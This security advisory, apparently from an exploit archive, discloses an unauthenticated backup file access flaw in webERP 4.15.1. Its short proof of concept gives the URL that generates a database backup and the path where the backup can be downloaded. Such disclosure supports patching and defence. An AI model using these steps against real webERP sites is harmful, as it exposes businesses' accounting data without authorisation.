webERP 4.15.1 Backup Disclosure

2020.05.06

Credit: Besim Altinok

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT
--------------------------------------------------------------------------
About Software:
webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.
-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------
1- This file generates new Backup File:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup file from:
--
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

webERP 4.15.1 Backup Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.